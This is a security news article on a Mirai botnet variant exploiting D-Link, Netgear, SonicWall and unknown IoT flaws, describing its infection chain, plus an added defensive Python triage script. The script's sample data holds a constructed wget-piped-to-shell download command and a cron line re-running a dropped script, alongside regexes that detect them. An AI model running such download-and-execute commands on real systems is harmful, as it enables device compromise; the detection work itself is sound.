New Mirai Variant Now Targets Sonic Wall, D-Link & IoT Devices!


A new Mirai variant is targeting known flaws in D-Link, Netgear & SonicWall devices, as well as newly discovered flaws in unknown IoT devices.

This new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear & SonicWall devices — as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.

Known Vulnerabilities

Since Feb. 16, the new variant has been targeting 6 known vulnerabilities & 3 previously unknown ones in order to infect systems & add them to a botnet. It is only the latest variant of Mirai to come to light, years after the source code for the malware was released in Oct. 2016.

“The attacks are still ongoing at the time of this writing,” observed researchers with Palo Alto Networks’ Unit 42 team on Mon. “Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviours such as downloading & executing Mirai variants & brute-forcers.”

New & Old Flaws

The attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: a SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit (CVE-2020-25506); Yealink Device Management remote code-execution (RCE) flaws (CVE-2021-27561 & CVE-2021-27562); a Netgear ProSAFE Plus RCE flaw (CVE-2020-26919); an RCE flaw in Micro Focus Operation Bridge Reporter (CVE-2021-22502); & a Netis WF2419 wireless router exploit (CVE-2019-19356).

The botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.

“We cannot say with certainty what the targeted devices are for the unidentified exploits,” Zhibin Zhang, principal researcher for Unit 42, explained. “However, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.”

2 RCE Attacks

The unidentified exploits include 2 RCE attacks: one targeting a command-injection vulnerability in certain components, & one targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitised).

The 3rd exploit targets the op type parameter, which is not properly sanitised, leading to a command injection, said researchers.

The latter has “been observed in the past being used by [the] Moobot [botnet], however the exact target is unknown,” researchers noted.

A Set of Binaries

After initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware’s infrastructure. The shell script then downloads several Mirai binaries & executes them, 1-by-1.

One such binary is lolol.sh, which has multiple functions. Lolol.sh deletes key folders from the target machine (including ones holding existing scheduled jobs & start-up scripts); creates packet filter rules to block incoming traffic to the commonly used SSH, HTTP & telnet ports (to make remote access to the affected system harder for admins); & schedules a job that aims to rerun the lolol.sh script every hour (for persistence).

Cron Configuration

Of note, researchers stated that this persistence step is flawed, as the cron configuration is incorrect.

Another binary (install.sh) downloads various files & packages – including Go Lang v1.9.4, the “nbrute” binaries (that brute-force various credentials) & the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by “nbrute”).

The final binary is called dark.[arch] & is based on the Mirai codebase. This binary mainly handles propagation, either via the various initial Mirai exploits described above, or via brute-forcing SSH connections using credentials hardcoded in the binary.
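The infection chain above (a downloader piped into a shell, an hourly cron job re-running a dropped script, and packet-filter rules that shut admins out of SSH, HTTP and telnet) leaves host-level traces a defender can check for. The following triage script is an added example written for this article; it is not code from Unit 42 or from the malware. The sample process command lines, crontab entries and iptables rules are constructed for illustration (the download host is an RFC 5737 test address), and the set of "suspect" script directories is an assumption of the example.

```python
"""Host triage for the post-exploitation behaviour described in the article.

Added example, not code from the article or Unit 42. Checks three indicators:
  1. a process command line that pipes wget/curl output straight into a shell,
  2. an hourly cron entry that re-runs a script from a world-writable directory,
  3. packet-filter rules that DROP inbound SSH, telnet or HTTP traffic.
"""
import re

# Ports the article says lolol.sh blocks to hinder remote administration.
BLOCKED_ADMIN_PORTS = {22, 23, 80}

# Directories where dropped scripts are commonly staged (assumption of this example).
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# wget/curl whose output is fed into sh/bash/ash via a pipe or command separator.
DOWNLOAD_PIPE_RE = re.compile(r"\b(wget|curl)\b[^|;&]*(\||;|&&)\s*(sh|bash|ash)\b")

# Hourly schedule, either "@hourly" or minute 0 of every hour, followed by the command.
CRON_HOURLY_RE = re.compile(r"^\s*(@hourly|0\s+\*\s+\*\s+\*\s+\*)\s+(?P<cmd>.+)$")

# iptables-save style INPUT rule that drops a given destination port.
IPTABLES_DROP_RE = re.compile(r"-A INPUT\b.*--dport\s+(?P<port>\d+).*-j\s+DROP")


def flag_download_pipes(cmdlines):
    """Return command lines that download content and execute it in a shell."""
    return [line for line in cmdlines if DOWNLOAD_PIPE_RE.search(line)]


def flag_cron(crontab_lines):
    """Return hourly cron entries whose command references a suspect directory."""
    hits = []
    for line in crontab_lines:
        m = CRON_HOURLY_RE.match(line)
        if m and any(d in m.group("cmd") for d in SUSPECT_DIRS):
            hits.append(line)
    return hits


def flag_iptables(rule_lines):
    """Return sorted admin ports that have an inbound DROP rule."""
    dropped = set()
    for line in rule_lines:
        m = IPTABLES_DROP_RE.search(line)
        if m and int(m.group("port")) in BLOCKED_ADMIN_PORTS:
            dropped.add(int(m.group("port")))
    return sorted(dropped)


def triage(cmdlines, crontab_lines, rule_lines):
    """Combine the three checks into one report; 'suspicious' is True if any hit."""
    report = {
        "download_pipes": flag_download_pipes(cmdlines),
        "hourly_cron_from_suspect_dir": flag_cron(crontab_lines),
        "dropped_admin_ports": flag_iptables(rule_lines),
    }
    report["suspicious"] = any(report[k] for k in
                               ("download_pipes", "hourly_cron_from_suspect_dir",
                                "dropped_admin_ports"))
    return report


# Constructed sample data (not real captures). 198.51.100.0/24 is reserved for docs.
SAMPLE_PROCESSES = [
    "/usr/sbin/sshd -D",
    "sh -c wget http://198.51.100.23/example.sh -O- | sh",
    "cron",
]
SAMPLE_CRONTAB = [
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly",
    "0 * * * * /tmp/lolol.sh",
    "@hourly /var/tmp/update.sh",
]
SAMPLE_IPTABLES = [
    "-A INPUT -p tcp -m tcp --dport 22 -j DROP",
    "-A INPUT -p tcp -m tcp --dport 23 -j DROP",
    "-A INPUT -p tcp -m tcp --dport 80 -j DROP",
    "-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PROCESSES, SAMPLE_CRONTAB, SAMPLE_IPTABLES).items():
        print(f"{key}: {value}")
```

On a live host the three inputs would come from `ps -eo args`, the system and per-user crontabs, and `iptables-save`; the checks are deliberately conservative (an hourly job from `/tmp` or a DROP on port 22 is worth a look even when benign), so treat a hit as a triage lead rather than a verdict.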

Mirai Variants Continue to Pop Up

The variant is only the latest to rely on Mirai’s source code, which has proliferated into more than 60 variants since bursting onto the scene with a massive distributed denial-of-service (DDoS) attack that took down DNS provider Dyn in 2016.

In 2020, a Mirai variant was discovered targeting Zyxel network-attached storage (NAS) devices using a critical vulnerability that was only recently discovered, according to security researchers.

In 2019, a variant of the botnet was discovered finding & targeting vulnerabilities in enterprise wireless presentation & display systems. A 2018 variant was used to launch a series of DDoS campaigns against financial-sector businesses.

Apply Patches

Researchers outlined that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.

“The IoT realm remains an easily accessible target for attackers,” according to Unit 42’s report. “Many vulnerabilities are very easy to exploit & could, in some cases, have catastrophic consequences.”
